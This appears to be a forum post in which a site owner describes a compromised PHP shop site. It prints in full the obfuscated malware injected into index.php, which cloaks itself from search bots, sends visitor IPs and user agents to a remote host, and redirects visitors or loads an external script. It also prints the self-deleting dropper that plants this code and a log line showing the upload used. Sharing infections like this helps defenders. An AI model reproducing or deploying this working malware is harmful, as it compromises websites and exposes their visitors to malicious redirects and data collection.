Code: Select all
<?php /* update */
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {
$referer = $_SERVER['HTTP_REFERER'];
$user=$_SERVER["HTTP_USER_AGENT"];
$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');
$b1223oghhmtjhms = base64_decode('QWRzQm90LUdvb2dsZXxBaHJlZnNCb3QvfEFwYWNoZS1IdHRwQ2xpZW50L3xCYWlkdXNwaWRlci98Q05DYXQvfERldVN1L3xEb3RCb3QvfEdvb2dsZSBmYXZpY29ufEdvb2dsZS1TaXRlLVZlcmlmaWNhdGlvbi98R29vZ2xlYm90LUltYWdlLzEuMHxHb29nbGVib3QvfEdyYXBlc2hvdENyYXdsZXIvfEd1enpsZUh0dHAvfEphdmEvMS58TGlua1N0YXRzIHxMaW5rcGFkQm90L3xMaW5rc01hc3RlclJvQm90L3xNSjEyYm90L3xNYWlsLlJVX0JvdC98TWVnYUluZGV4LnJ1L3xOZXRTZWVyIGNyYXdsZXIvfE5ldGNhdCBCb3R8T2RrbEJvdC98UmlkZGxlcnxSb29rZWVCb3R8UnVuZXQtUmVzZWFyY2gtQ3Jhd2xlcnxTZW1ydXNoQm90L3xTZW9wdWx0Q29udGVudEFuYWx5emVyfFNwdXRuaWtGYXZpY29uQm90L3xTdGF0T25saW5lUnVCb3QvfFN1cnZleUJvdC98VmFsaWRhdG9yLm51L3xXM0NfVmFsaWRhdG9yL3xXZWItTW9uaXRvcmluZy98V2ViQXJ0ZXhCb3R8V2Vic3F1YXNoLmNvbXxZIUotQVNSL3xZYURpcmVjdEZldGNoZXIvfFlhaG9vISBTbHVycHxZYW5kZXgvfFlhbmRleEJvdC98WWFuZGV4RGlyZWN0L3xZYW5kZXhJbWFnZXMvfFlhbmRleE1ldHJpa2EvfFlhbmRleE1vYmlsZUJvdC98WWFuZGV4V2VibWFzdGVyL3xhcmNoaXZlLm9yZ19ib3R8YmluZ2JvdC98Ym90L051dGNoLXxlU3luZGlDYXQgQm90fGZhY2Vib29rZXh0ZXJuYWxoaXQvfHBlYXIucGhwLm5ldHxsaW5rZGV4Ym90L3xsdHg3MXxtZWFucGF0aGJvdC98bmV0RXN0YXRlfG9wZW5zdGF0LnJ1L3xwYXJzZXIzfHByLWN5LnJ1fHB5dGhvbi1yZXF1ZXN0cy98cm9nZXJib3QvfHN0YXRkb20ucnUvfHRyZW5kaWN0aW9ufFBIUC98dmtTaGFyZXxDVUJPVF9OT1RFX1N8R29vZ2xlYm90L3xBZHNCb3QtR29vZ2xlfFRrQm90L3xZYW5kZXhBbnRpdmlydXN8TWFpbC5SVV9Cb3Q');
$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');
$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];
if (preg_match("/(".$white_engine_search.")/i" , $referer)){
$oc = explode('|',$b1223oghhmtjhms);
foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}
setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");
$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");
function v64547f9857d8dc65(){
global $v634894f9845d8dc65;
$dats = 1;
if(function_exists('curl_version')){
$kd88fc6edf21ea464 = curl_init();
curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);
curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));
curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));
curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);
$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);
curl_close($kd88fc6edf21ea464);
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}else{
$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}
return false;
}
if (!empty($_SERVER['HTTP_CLIENT_IP'])){
$ip = $_SERVER['HTTP_CLIENT_IP'];
}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];
$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));
$m9b207167e5381c47 = v64547f9857d8dc65();
if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {
$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;
header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);
}else{
$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');
$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');
$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];
echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";
exit;
}
}
} /* update */ ?><?php /* update */
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {
$referer = $_SERVER['HTTP_REFERER'];
$user=$_SERVER["HTTP_USER_AGENT"];
$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');
$b1223oghhmtjhms = base64_decode('QWRzQm90LUdvb2dsZXxBaHJlZnNCb3QvfEFwYWNoZS1IdHRwQ2xpZW50L3xCYWlkdXNwaWRlci98Q05DYXQvfERldVN1L3xEb3RCb3QvfEdvb2dsZSBmYXZpY29ufEdvb2dsZS1TaXRlLVZlcmlmaWNhdGlvbi98R29vZ2xlYm90LUltYWdlLzEuMHxHb29nbGVib3QvfEdyYXBlc2hvdENyYXdsZXIvfEd1enpsZUh0dHAvfEphdmEvMS58TGlua1N0YXRzIHxMaW5rcGFkQm90L3xMaW5rc01hc3RlclJvQm90L3xNSjEyYm90L3xNYWlsLlJVX0JvdC98TWVnYUluZGV4LnJ1L3xOZXRTZWVyIGNyYXdsZXIvfE5ldGNhdCBCb3R8T2RrbEJvdC98UmlkZGxlcnxSb29rZWVCb3R8UnVuZXQtUmVzZWFyY2gtQ3Jhd2xlcnxTZW1ydXNoQm90L3xTZW9wdWx0Q29udGVudEFuYWx5emVyfFNwdXRuaWtGYXZpY29uQm90L3xTdGF0T25saW5lUnVCb3QvfFN1cnZleUJvdC98VmFsaWRhdG9yLm51L3xXM0NfVmFsaWRhdG9yL3xXZWItTW9uaXRvcmluZy98V2ViQXJ0ZXhCb3R8V2Vic3F1YXNoLmNvbXxZIUotQVNSL3xZYURpcmVjdEZldGNoZXIvfFlhaG9vISBTbHVycHxZYW5kZXgvfFlhbmRleEJvdC98WWFuZGV4RGlyZWN0L3xZYW5kZXhJbWFnZXMvfFlhbmRleE1ldHJpa2EvfFlhbmRleE1vYmlsZUJvdC98WWFuZGV4V2VibWFzdGVyL3xhcmNoaXZlLm9yZ19ib3R8YmluZ2JvdC98Ym90L051dGNoLXxlU3luZGlDYXQgQm90fGZhY2Vib29rZXh0ZXJuYWxoaXQvfHBlYXIucGhwLm5ldHxsaW5rZGV4Ym90L3xsdHg3MXxtZWFucGF0aGJvdC98bmV0RXN0YXRlfG9wZW5zdGF0LnJ1L3xwYXJzZXIzfHByLWN5LnJ1fHB5dGhvbi1yZXF1ZXN0cy98cm9nZXJib3QvfHN0YXRkb20ucnUvfHRyZW5kaWN0aW9ufFBIUC98dmtTaGFyZXxDVUJPVF9OT1RFX1N8R29vZ2xlYm90L3xBZHNCb3QtR29vZ2xlfFRrQm90L3xZYW5kZXhBbnRpdmlydXN8TWFpbC5SVV9Cb3Q');
$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');
$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];
if (preg_match("/(".$white_engine_search.")/i" , $referer)){
$oc = explode('|',$b1223oghhmtjhms);
foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}
setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");
$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");
function v64547f9857d8dc65(){
global $v634894f9845d8dc65;
$dats = 1;
if(function_exists('curl_version')){
$kd88fc6edf21ea464 = curl_init();
curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);
curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));
curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));
curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);
$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);
curl_close($kd88fc6edf21ea464);
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}else{
$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));
$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);
if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {
return $ke4e46deb7f9cc58c;
}else{
return $dats;
}
}
return false;
}
if (!empty($_SERVER['HTTP_CLIENT_IP'])){
$ip = $_SERVER['HTTP_CLIENT_IP'];
}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];
$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));
$m9b207167e5381c47 = v64547f9857d8dc65();
if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {
$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;
header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);
}else{
$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');
$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');
$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];
echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";
exit;
}
}
} /* update */ ?>
After checking the logs I discovered this:
Code: Select all
[28/Feb/2020:10:56:53 +0200] "POST /catalog/controller/affiliate/image.php HTTP/1.1" 200 41 "*****.com/catalog/controller/affiliate/image.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
A file named config_old.php is created in the admin folder, the file that modifies the index.php file in the root. The code inserted in index.php causes users to be redirected to malicious sites!
The attacker used the application installed on the server to access unauthorized site files and to infect them.Instead of uploading an image to the server for editing, it sent a malicious code encoded through base64, which then automatically renamed it to conf_old.php then infected index.php
config_old.php content
Code: Select all
<?php
$dt = base64_decode('PD9waHAgLyogdXBkYXRlICovDQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pICYmICFpc3NldCgkX0NPT0tJRVsnZGF0YXNlcmsnXSkgJiYgaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkgew0KCSRyZWZlcmVyID0gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KCSR1c2VyPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsNCgkkd2hpdGVfZW5naW5lX3NlYXJjaCA9IGJhc2U2NF9kZWNvZGUoJ1oyOXZaMnhsZkdKcGJtZDhlV0Z1WkdWNGZHSmhhV1IxZkhsaGFHOXZmR1IxWTJ0a2RXTnJaMjk4WVhOcmZHMWhhV3d1WTN4dFlXbHNMbko4ZEdWc1pXZHlZVzE4YkdsMlpXbHVkR1Z5Ym1WMGZIZGxZMmhoZEh4dGVYTndZV05sZkhSMWJXSnNjbnhzYVc1clpXUnBibnh5WldSa2FYUjhjR2x1ZEdWeVpYTjBmSFIzYVhSMFpYSjhhVzV6ZEdGbmNtRnRmR1poWTJWaWIyOXJmSFpyTG1OOGFHOTBiV0ZwYkh4bmJXRnBiSHh2Y21GdVoyVjhiMnN1Y25WOFoyMTRmR0Z2YkEnKTsNCgkkYjEyMjNvZ2hobXRqaG1zID0gYmFzZTY0X2RlY29kZSgnUVdSelFtOTBMVWR2YjJkc1pYeEJhSEpsWm5OQ2IzUXZmRUZ3WVdOb1pTMUlkSFJ3UTJ4cFpXNTBMM3hDWVdsa2RYTndhV1JsY2k5OFEwNURZWFF2ZkVSbGRWTjFMM3hFYjNSQ2IzUXZmRWR2YjJkc1pTQm1ZWFpwWTI5dWZFZHZiMmRzWlMxVGFYUmxMVlpsY21sbWFXTmhkR2x2Ymk5OFIyOXZaMnhsWW05MExVbHRZV2RsTHpFdU1IeEhiMjluYkdWaWIzUXZmRWR5WVhCbGMyaHZkRU55WVhkc1pYSXZmRWQxZW5wc1pVaDBkSEF2ZkVwaGRtRXZNUzU4VEdsdWExTjBZWFJ6SUh4TWFXNXJjR0ZrUW05MEwzeE1hVzVyYzAxaGMzUmxjbEp2UW05MEwzeE5TakV5WW05MEwzeE5ZV2xzTGxKVlgwSnZkQzk4VFdWbllVbHVaR1Y0TG5KMUwzeE9aWFJUWldWeUlHTnlZWGRzWlhJdmZFNWxkR05oZENCQ2IzUjhUMlJyYkVKdmRDOThVbWxrWkd4bGNueFNiMjlyWldWQ2IzUjhVblZ1WlhRdFVtVnpaV0Z5WTJndFEzSmhkMnhsY254VFpXMXlkWE5vUW05MEwzeFRaVzl3ZFd4MFEyOXVkR1Z1ZEVGdVlXeDVlbVZ5ZkZOd2RYUnVhV3RHWVhacFkyOXVRbTkwTDN4VGRHRjBUMjVzYVc1bFVuVkNiM1F2ZkZOMWNuWmxlVUp2ZEM5OFZtRnNhV1JoZEc5eUxtNTFMM3hYTTBOZlZtRnNhV1JoZEc5eUwzeFhaV0l0VFc5dWFYUnZjbWx1Wnk5OFYyVmlRWEowWlhoQ2IzUjhWMlZpYzNGMVlYTm9MbU52Ylh4WklVb3RRVk5TTDN4WllVUnBjbVZqZEVabGRHTm9aWEl2ZkZsaGFHOXZJU0JUYkhWeWNIeFpZVzVrWlhndmZGbGhibVJsZUVKdmRDOThXV0Z1WkdWNFJHbHlaV04wTDN4WllXNWtaWGhKYldGblpYTXZmRmxoYm1SbGVFMWxkSEpwYTJFdmZGbGhibVJsZUUxdlltbHNaVUp2ZEM5OFdXRnVaR1Y0VjJWaWJXRnpkR1Z5TDN4aGNtTm9hWFpsTG05eVoxOWliM1I4WW1sdVoySnZkQzk4WW05MEwwNTFkR05vTFh4bFUzbHVaR2xEWVhRZ1FtOTBmR1poWTJWaWIyOXJaWGgwWlhKdVlXeG9hWFF2ZkhCbFlYSXVjR2h3TG01bGRIeHNhVzVyWkdWNFltOTBMM3hzZEhnM01YeHRaV0Z1Y0dGMGFHSnZkQzk4Ym1WMFJYTjBZWFJsZkc5d1pXNXpkR0YwTG5KMUwzeHdZWEp6WlhJemZIQnlMV041TG5KMWZIQjVkR2h2YmkxeVpYRjFaWE4wY3k5OGNtOW5aWEppYjNRdmZITjBZWFJrYjIwdWNuVXZmSFJ5Wlc1a2FXTjBhVzl1ZkZCSVVDOThkbXRUYUdGeVpRJyk7DQoJJGVma2JnbWtibWdobG49YXJyYXkoJ2RHaGxlR1ppWm1kaWFHNXFiV3BxWm1kaVltUm1kbVpuTG1sdVptOCcpOw0KCSRlZmtiZ21rYm1naGxuPSRlZmtiZ21rYm1naGxuW2FycmF5X3JhbmQoJGVma2JnbWtibWdobG4pXTsNCglpZiAocHJlZ19tYXRjaCgiLygiLiR3aGl0ZV9lbmdpbmVfc2VhcmNoLiIpL2kiICwgJHJlZmVyZXIpKXsNCgkJJG9jID0gZXhwbG9kZSgnfCcsJGIxMjIzb2doaG10amhtcyk7DQoJCWZvcmVhY2goJG9jIGFzICR2YWwpe2lmKHN0cnBvcygkdXNlciwkdmFsKSAhPT0gRkFMU0Upe3NldGNvb2tpZSgiZGF0YXNlcmsiLCJ2aXRlZGlkNmZlMWQwYmU2MzQiLHRpbWUoKSsyNTkyMDAwLCAiLyIpOyBicmVhazt9fQ0KCQlzZXRjb29raWUoImRhdGFzZXJrIiwidml0ZWRpZDZmZTFkMGJlNjM0Iix0aW1lKCkrMjU5MjAwMCwgIi8iKTsNCgkJJGVkNmZlMWQwYmU2MzQ3YjhlID0gYmFzZTY0X2RlY29kZSgiTDJsdVpHVjRMejgzTlRZeE5UYzJNalkxTVRJMCIpOw0KCQlmdW5jdGlvbiB2NjQ1NDdmOTg1N2Q4ZGM2NSgpew0KCQkJZ2xvYmFsICR2NjM0ODk0Zjk4NDVkOGRjNjU7DQoJCQlpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpKXsNCgkJCQkka2Q4OGZjNmVkZjIxZWE0NjQgPSBjdXJsX2luaXQoKTsNCgkJCQljdXJsX3NldG9wdCgka2Q4OGZjNmVkZjIxZWE0NjQsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KCQkJCWN1cmxfc2V0b3B0KCRrZDg4ZmM2ZWRmMjFlYTQ2NCwgQ1VSTE9QVF9VU0VSQUdFTlQsIGJhc2U2NF9kZWNvZGUoJ2JtVjNjbVZ4ZFdWemRBPT0nKSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1VSTCwgYmFzZTY0X2RlY29kZSgkdjYzNDg5NGY5ODQ1ZDhkYzY1KSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1RJTUVPVVQsIDEwKTsNCgkJCQkkbWI0YTg4NDE3YjNkMDE3MGQgPSBjdXJsX2V4ZWMoJGtkODhmYzZlZGYyMWVhNDY0KTsNCgkJCQljdXJsX2Nsb3NlKCRrZDg4ZmM2ZWRmMjFlYTQ2NCk7DQoJCQkJJGtlNGU0NmRlYjdmOWNjNThjID0ganNvbl9kZWNvZGUoJG1iNGE4ODQxN2IzZDAxNzBkLCB0cnVlKTsNCgkJCQlpZiAoJGtlNGU0NmRlYjdmOWNjNThjW2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSkgew0KCQkJCQlyZXR1cm4gJGtlNGU0NmRlYjdmOWNjNThjOw0KCQkJCX0NCgkJCX1lbHNlew0KCQkJCSRtYjRhODg0MTdiM2QwMTcwZCA9IGZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJHY2MzQ4OTRmOTg0NWQ4ZGM2NSkpOw0KCQkJCSRrZTRlNDZkZWI3ZjljYzU4YyA9IGpzb25fZGVjb2RlKCRtYjRhODg0MTdiM2QwMTcwZCwgdHJ1ZSk7DQoJCQkJaWYgKCRrZTRlNDZkZWI3ZjljYzU4Y1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCQkJcmV0dXJuICRrZTRlNDZkZWI3ZjljYzU4YzsNCgkJCQl9CQkNCgkJCX0NCgkJCXJldHVybiBmYWxzZTsNCgkJfQ0KCQlpZiAoIWVtcHR5KCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddKSl7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9DTElFTlRfSVAnXTsNCgkJfWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTsNCgkJfWVsc2V7DQoJCQkkaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCgkJfQ0KCQkkZ25qa2hrZ2pmaGtoaCA9ICRpcC4nfCcuJHVzZXIuJ3wnLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLid8Jy50aW1lKCkuJ3wnLiRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCgkJJHY2MzQ4OTRmOTg0NWQ4ZGM2NSA9IGJhc2U2NF9lbmNvZGUoYmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMdycpLmJhc2U2NF9kZWNvZGUoJGVma2JnbWtibWdobG4pLmJhc2U2NF9kZWNvZGUoJ0x6OXdZWEpoYlhNOScpLmJhc2U2NF9lbmNvZGUoJGduamtoa2dqZmhraGgpKTsNCgkJJG05YjIwNzE2N2U1MzgxYzQ3ID0gdjY0NTQ3Zjk4NTdkOGRjNjUoKTsNCgkJaWYgKCRtOWIyMDcxNjdlNTM4MWM0N1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCSR5ZTYxN2VmNjk3NGZhY2VkNCA9IGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THc9PScpIC4gJG05YjIwNzE2N2U1MzgxYzQ3W2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSAuICRlZDZmZTFkMGJlNjM0N2I4ZTsNCgkJCWhlYWRlcihiYXNlNjRfZGVjb2RlKCdURzlqWVhScGIyNDZJQT09JykgLiAkeWU2MTdlZjY5NzRmYWNlZDQpOw0KCQl9DQoJfQ0KfSAvKiB1cGRhdGUgKi8gPz4');
$path = $_SERVER['DOCUMENT_ROOT'];
$path = rtrim($path, '/');
if(file_exists($path.'/index.php')){
$dts = file_get_contents($path.'/index.php');
if(strpos($dts,'global $v634894f9845d8dc65') !== false){
$dtss = explode('} /* update */ ?>',$dts);
if(isset($dtss[1]) && strpos($dtss[1],'global $v634894f9845d8dc65') === false){
$dts = $dtss[1];
}elseif(isset($dtss[2]) && strpos($dtss[2],'global $v634894f9845d8dc65') === false){
$dts = $dtss[2];
}elseif(isset($dtss[3]) && strpos($dtss[3],'global $v634894f9845d8dc65') === false){
$dts = $dtss[3];
}elseif(isset($dtss[4]) && strpos($dtss[4],'global $v634894f9845d8dc65') === false){
$dts = $dtss[4];
}else{
$dts = '';
}
}
$dts = $dt.$dts;
file_put_contents($path.'/index.php', $dts);
}
$path = dirname(__FILE__);
$filename = $_SERVER['PHP_SELF'];
$fp = fopen($_SERVER['PHP_SELF'], 'w+');
if(file_exists($_SERVER['SCRIPT_FILENAME'])){
unlink($_SERVER['SCRIPT_FILENAME']);
}
if(file_exists(__FILE__)){
unlink(__FILE__);
}
?>
https://www.imunify360.com/blog/malware ... -processor